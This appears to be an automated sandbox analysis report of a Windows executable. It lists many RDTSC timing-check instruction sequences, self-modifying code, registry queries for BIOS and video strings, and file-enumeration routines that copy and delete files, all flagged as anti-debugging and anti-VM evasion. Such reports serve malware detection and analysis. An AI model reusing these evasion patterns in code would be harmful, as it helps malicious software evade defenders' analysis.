                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469329 second address: 1469362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F98450EE8D8h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F98450EE8D1h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469895 second address: 1469899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469899 second address: 14698A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F98450EE8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14707E7 second address: 14707FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14707FD second address: 1470801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1470801 second address: 1470805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473703 second address: 147370B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473856 second address: 1473872 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F9844BC1D63h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473872 second address: 14738C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8D8h 0x00000009 pop ebx 0x0000000a jmp 00007F98450EE8D4h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F98450EE8D8h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14739E8 second address: 1473A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9844BC1D69h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473A0C second address: 1473A1C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F98450EE8C6h 0x00000008 jno 00007F98450EE8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473A1C second address: 1473A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473A22 second address: 1473A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F98450EE8C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473BAC second address: 1473BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473BC4 second address: 1473BDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F98450EE8CBh 0x00000008 jnc 00007F98450EE8C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473BDA second address: 1473BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147408B second address: 147408F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147408F second address: 1474098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1474243 second address: 147424B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147424B second address: 147426D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F9844BC1D56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F9844BC1D61h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B00C second address: 147B012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B012 second address: 147B020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F9844BC1D5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B3F4 second address: 147B3F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B3F9 second address: 147B3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B57C second address: 147B590 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F98450EE8C6h 0x00000008 jmp 00007F98450EE8CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B6D1 second address: 147B6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B6D5 second address: 147B6D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B6D9 second address: 147B6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F9844BC1D5Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B6E9 second address: 147B6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147BDCD second address: 147BDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1481B30 second address: 1481B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F98450EE8C6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jns 00007F98450EE8C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1484791 second address: 1484795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F6E7 second address: 148F6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F6EB second address: 148F6F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F6F7 second address: 148F711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F711 second address: 148F717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149524D second address: 1495260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F98450EE8D2h 0x0000000b ja 00007F98450EE8C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C26B second address: 149C26F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C26F second address: 149C27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jnp 00007F98450EE8C6h 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6A85 second address: 14A6A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jng 00007F9844BC1D56h 0x0000000c jmp 00007F9844BC1D5Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14ABB2B second address: 14ABB60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F98450EE8D4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F98450EE8D5h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14ABCBA second address: 14ABCC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14ABCC0 second address: 14ABCC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14ABCC6 second address: 14ABCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F9844BC1D58h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14ABE40 second address: 14ABE46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14ABE46 second address: 14ABE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC160 second address: 14AC197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D8h 0x00000007 jmp 00007F98450EE8D4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC197 second address: 14AC19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC19D second address: 14AC1A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F98450EE8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC1A9 second address: 14AC1D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9844BC1D63h 0x0000000a jmp 00007F9844BC1D60h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BC97A second address: 14BC982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BC982 second address: 14BC99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F9844BC1D71h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9844BC1D5Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BC99C second address: 14BC9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CCA26 second address: 14CCA6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D63h 0x00000007 jmp 00007F9844BC1D62h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9844BC1D5Bh 0x00000015 jmp 00007F9844BC1D5Eh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CCA6A second address: 14CCA6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CCA6F second address: 14CCA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DC605 second address: 14DC61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F98450EE8CEh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DC61F second address: 14DC628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DC628 second address: 14DC62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DC62E second address: 14DC638 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9844BC1D56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DD061 second address: 14DD066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DD066 second address: 14DD0A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F9844BC1D56h 0x00000009 jmp 00007F9844BC1D63h 0x0000000e popad 0x0000000f jmp 00007F9844BC1D64h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DD0A5 second address: 14DD0C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F98450EE8C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DD0C8 second address: 14DD0CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DD0CC second address: 14DD0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DD386 second address: 14DD38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DD519 second address: 14DD51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DD51F second address: 14DD528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DD528 second address: 14DD52C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14E1C80 second address: 14E1C90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14E1C90 second address: 14E1C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14E49AF second address: 14E49CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9844BC1D69h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14E49CE second address: 14E49EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F98450EE8C6h 0x00000009 je 00007F98450EE8C6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push esi 0x00000014 jc 00007F98450EE8C6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14E72AB second address: 14E72B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14E756E second address: 14E7574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14E8D07 second address: 14E8D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14E8D0B second address: 14E8D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14EAB84 second address: 14EAB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F9844BC1D56h 0x0000000d js 00007F9844BC1D56h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56402ED second address: 56402F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56402F1 second address: 56402F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56402F5 second address: 56402FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56402FB second address: 5640301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640301 second address: 5640344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, edi 0x0000000c pushfd 0x0000000d jmp 00007F98450EE8CDh 0x00000012 sub eax, 707CBF96h 0x00000018 jmp 00007F98450EE8D1h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F98450EE8CDh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640344 second address: 5640365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, bx 0x00000011 mov cx, di 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56403BE second address: 56403DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56403DA second address: 56403E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56403E0 second address: 56403E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56403E4 second address: 56403F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, ecx 0x0000000e mov di, cx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F523 second address: 140F52D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F98450EE8C6h 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1261B0D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1400140 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 14286AF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1413F9F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12619F9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01014910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_01014910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_010138B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0100DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0100ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01014570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_01014570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0100E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0100DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0100BE70
